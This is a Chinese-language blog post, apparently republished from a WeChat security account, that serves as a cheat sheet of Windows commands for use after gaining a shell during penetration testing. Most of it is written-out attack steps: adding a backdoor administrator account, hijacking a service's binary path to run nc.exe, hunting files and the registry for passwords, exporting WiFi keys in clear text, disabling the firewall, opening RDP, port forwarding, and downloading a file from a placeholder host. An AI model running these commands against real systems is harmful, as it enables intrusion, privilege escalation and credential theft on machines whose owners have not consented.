前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >windows常用命令

windows常用命令

作者头像
信安之路
发布2018-08-08 14:16:41
6110
发布2018-08-08 14:16:41
举报
文章被收录于专栏:信安之路

在渗透测试中遇到 Windows 的概率是非常大的,那么在拿到一台服务器权限之后,通常会获得一个 shell,想要进行下一步渗透,几乎都是需要通过在 shell 中使用 Windows 的命令来进行渗透的,下面是一些常用的命令,虽然以前都发过了,但是很多人是不怎么反旧文的,所以每发出一次都会有人或多或少能学点东西,我就再发发,多看一遍多加深一点印象,凑合着看吧,最近实在是时间不多,压力大呀!

net 的常用用法

查看共享连接

net use

增加远程共享

net use \host /u:user pass

查看域中当前的主机列表

net view /domain

查看当前域中的用户

net user /domain

增加一个本地用户

net user user pass /add

将新增的用户加到本地管理员组

net localgroup "Administrators" user /add

查看域中的密码策略

net accounts /domain

查看本地组

net localgroup "Group"

查看域中的组信息

net group /domain

查看域中指定组的成员

net group "Domain group" /domain

查看当前机器所在的域名

net config workstation

查看当前服务器所在的域名

net config server

系统信息相关命令

显示系统信息

systeminfo

查看远程主机的系统信息

systeminfo /S ip /U domain\user /P Pwd

显示进程和服务信息

tasklist /svc

显示所有进程以及DLL信息

tasklist /m

显示进程和所有者

tasklist /v

查看远程主机的进程列表

tasklist /S ip /v

搜索所有 pdf 文件

dir /a /s /b c:\'.pdf'

显示服务信息

sc query

显示具体的服务信息(包括二进制路径和运行使用)

sc qc Spooler

找出文件名字包含 password 的文件

findstr /si 'password' .txt

搜索敏感文件名称

dir /s *pass* == *cred* == *vnc* == *.config*

更改服务的二进制路径

sc config upnphost binpath= "C:\nc.exe"

修改系统服务的权限

sc config upnphost obj= ".\LocalSystem" password= ""

检查系统服务的权限

accesschk.exe -ucqv "Authenticated Users" * /accepteula

检查指定服务的权限

accesschk.exe -ucqv ServceName /accepteula

检查指定组在指定目录下的写权限

accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula

网络信息

打印路由表

route print

保存当前主机上的所有WiFi信息

netsh wlan export profile folder=. key=clear

设置当前配置禁用防火墙

netsh advfirewall set currentprofile state off

设置端口转发

netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2

开启远程访问

启用远程访问

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

启用远程协助

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

修改远程访问端口

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 12345 /f

注册表操作

查找注册表中的密码

reg query HKLM /f password /t REG_SZ /s

查询 winlogon 信息

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

使用 powershell

下载文件

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://blabla.com/test.txt','C:\Users\admin\Desktop\test.test')"

列出运行的服务

Get-Service I where object {$ .status -eq ''Running''}

编译 C# 代码

1、切换到 .NET 目录

cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (或者 .NET 的对应版本的目录)

2、编译 x86 版本

csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:<out_file_name> /platform:x86 "/cs/files/dir/*.cs"

3、编译 x64 版本

csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:<out_file_name> /platform:x64 "/cs/files/dir/*.cs"

总结

命令列出来了,剩下的就靠大家在自己的电脑上测试吧,看看执行的结果,了解一下这些命令的作用,看如何在实际的渗透中应用,话不多说,有好文章的给我投稿呦。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-11-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安之路 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • net 的常用用法
  • 系统信息相关命令
  • 网络信息
  • 开启远程访问
  • 注册表操作
  • 使用 powershell
  • 编译 C# 代码
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档